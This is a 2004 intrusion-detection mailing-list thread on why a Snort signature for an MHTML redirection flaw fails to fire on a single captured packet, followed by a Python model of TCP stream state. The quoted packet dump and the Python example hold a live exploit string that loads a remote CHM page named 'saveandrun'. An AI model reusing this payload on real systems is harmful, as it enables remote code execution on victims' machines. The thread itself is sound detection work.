[Intrusions] mhtml signature
Judy Novak
judy.novak at sourcefire.com
Wed Aug 4 17:26:12 GMT 2004
Lola,
An "established" session is one where the TCP 3-way handshake has
occurred and valid data is exchanged between the hosts. This is
absolutely what you want in the signature because you really only care
about valid data being exchanged. Without the 3-way handshake, this
could just be a bogus packet sent by someone trying to get Snort to
alert. There were tools such as stick and snot that did this long ago
before Snort kept state of TCP sessions.
You should look in your tcpdump session and make sure that you collected
the packets associated with the 3-way handshake for the packet that
you've captured for this rule. If they are not there, this rule will not
fire as written.
Judy
lola marais wrote:
> I have been working on a problem and require the assistance of the
> broader list community.
> Credit is given to the owner of this signature at
> http://sourceforge.net/mailarchive/message.php?msg_id=7758516
>
>
> I am planning on using this signature for a detect in part 2 of my GCIA
> practical.
>
> The problem is that I am not able to get it working 100% with the data
> that I have. By not working I mean that it will miss the single packet
> that I have captured.
>
> I have captured some data from a network using tcpdump. The capture
> contains the data content required to trigger the event. The capture
> contains a single packet for that session, no more.
>
> When I read the data past Snort with the signature enabled, then NO
> alerts are triggered. If I remove the part of the signature
> "flow:from_server,established" and then pass the same data I have 1 event
>
> The signature looks for an established connection.
> My question is:
>
> 1. Why has the author of the signature decided to look for an
> established connection?
> 2. Does the signature stand a chance of missing some events by looking
> only for established connections?
>
> The current version of the signature has the following structure.
>
> alert tcp any any -> $HOME_NET any (msg:"Microsoft MTHML URL
> Redirection Attempt"; flow:from_server,established;
> content:"mhtml|3A|file|3A|"; nocase; reference:cve,CAN-2004-0380;
> reference:url,www.microsoft.com/technet/security/.../MS04-013.mspx;
> classtype:web-application-attack; rev:2;)
>
> The data packet that I have captured looks as follows:
>
> 07/28/04-11:23:51.262652 MAC:removed -> MAC:removed type:0x800 len:0xC2
> Proxy:ProxyPort -> InternalHost:4003 TCP TTL:63 TOS:0x0 ID:33030
> IpLen:20 DgmLen:176 DF
> ***AP**F Seq: 0xDC274ADF Ack: 0x2B3B3965 Win: 0xC1E8 TcpLen: 20
> 0x0000: 00 0A 42 42 80 0A 00 03 32 87 9A 71 08 00 45 00 ..BB....2..q..E.
> 0x0010: 00 B0 81 06 40 00 3F 06 2B 92 9E A9 83 0D 9E A6 ....@.?.+.......
> 0x0020: CE 52 1F 4C 0F A3 DC 27 4A DF 2B 3B 39 65 50 19 .R.L...'J.+;9eP.
> 0x0030: C1 E8 70 F3 00 00 20 20 20 20 3C 6F 62 6A 65 63 ..p... <objec
> 0x0040: 74 20 64 61 74 61 3D 22 26 23 31 30 39 3B 73 2D t data="ms-
> 0x0050: 69 74 73 3A 6D 68 74 6D 6C 3A 66 69 6C 65 3A 2F its:mhtml:file:/
> 0x0060: 2F 43 3A 5C 66 6F 6F 2E 6D 68 74 21 68 74 74 70 /C:\foo.mht!http
> 0x0070: 3A 2F 2F 77 77 77 2E 66 72 65 65 33 32 2E 63 6F ://www.free32.co
> 0x0080: 6D 2F 50 4F 50 2E 43 48 4D 3A 3A 2F 73 61 76 65 m/POP.CHM::/save
> 0x0090: 61 6E 64 72 75 6E 2E 68 74 6D 22 20 74 79 70 65 andrun.htm" type
> 0x00A0: 3D 22 74 65 78 74 2F 78 2D 73 63 72 69 70 74 6C ="text/x-scriptl
> 0x00B0: 65 74 22 3E 3C 2F 6F 62 6A 65 63 74 3E 20 D1 7F et"></object> ..
> 0x00C0: CA 27 .'
>
> _______________________________________________
> Intrusions mailing list
> Intrusions at lists.sans.org
> http://www.dshield.org/mailman/listinfo/intrusions
>
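A small model of the point Judy makes, added here as example code (it is not Snort's stream code): the same rule is run over the captured ***AP**F packet alone and over that packet preceded by a constructed three-way handshake, which is the difference between Lola's 0 alerts and 1 alert. Host names, the server port read from the dump's TCP header (0x1F4C), and www.example.com standing in for the blocked host are assumptions.

```python
# Added example, not Snort's code: a toy model of flow:from_server,established.
# Hosts, ports and handshake packets are constructed; payload follows the dump.
from dataclasses import dataclass

# TCP data from offset 0x36 of the dump; "www.example.com" replaces the blocked host.
CAPTURED_PAYLOAD = rb'    <object data="&#109;s-its:mhtml:file://C:\foo.mht!http://www.example.com/POP.CHM::/saveandrun.htm" type="text/x-scriptlet"></object> '
CLIENT = ("InternalHost", 4003)   # destination host:port in the dump
SERVER = ("Proxy", 8012)          # source; port 0x1F4C in the dump's TCP header

@dataclass
class Packet:
    src: tuple
    dst: tuple
    flags: frozenset              # subset of {"S", "A", "P", "F"}
    payload: bytes = b""

class StreamTracker:
    """Minimal stateful tracking: the session is 'established' only after the
    SYN, SYN/ACK, ACK exchange was seen; the SYN sender is the client, the
    host that answered it is the server (what from_server refers to)."""
    def __init__(self):
        self.client = self.server = None
        self.state = "NONE"       # NONE -> SYN_SENT -> SYN_RECV -> ESTABLISHED

    def observe(self, pkt):
        if self.state == "NONE" and pkt.flags == {"S"}:
            self.client, self.server, self.state = pkt.src, pkt.dst, "SYN_SENT"
        elif self.state == "SYN_SENT" and pkt.flags == {"S", "A"} and pkt.src == self.server:
            self.state = "SYN_RECV"
        elif self.state == "SYN_RECV" and "A" in pkt.flags and pkt.src == self.client:
            self.state = "ESTABLISHED"

def rule_matches(tracker, pkt):
    """flow:from_server,established; content:"mhtml|3A|file|3A|"; nocase;"""
    tracker.observe(pkt)
    if tracker.state != "ESTABLISHED" or pkt.src != tracker.server:
        return False              # flow options fail, content is never checked
    return b"mhtml:file:" in pkt.payload.lower()

def count_alerts(packets):
    """Run the rule over a packet list with a fresh tracker; returns alert count."""
    tracker = StreamTracker()
    return sum(rule_matches(tracker, p) for p in packets)

DATA = Packet(SERVER, CLIENT, frozenset("APF"), CAPTURED_PAYLOAD)  # the ***AP**F packet
HANDSHAKE = [Packet(CLIENT, SERVER, frozenset("S")), Packet(SERVER, CLIENT, frozenset("SA")),
             Packet(CLIENT, SERVER, frozenset("A"))]

print("lone packet:", count_alerts([DATA]))                     # 0, Lola's result
print("handshake + packet:", count_alerts(HANDSHAKE + [DATA]))  # 1
```

The same payload sent by the client side after the handshake also gives 0, since from_server fails even though the content matches.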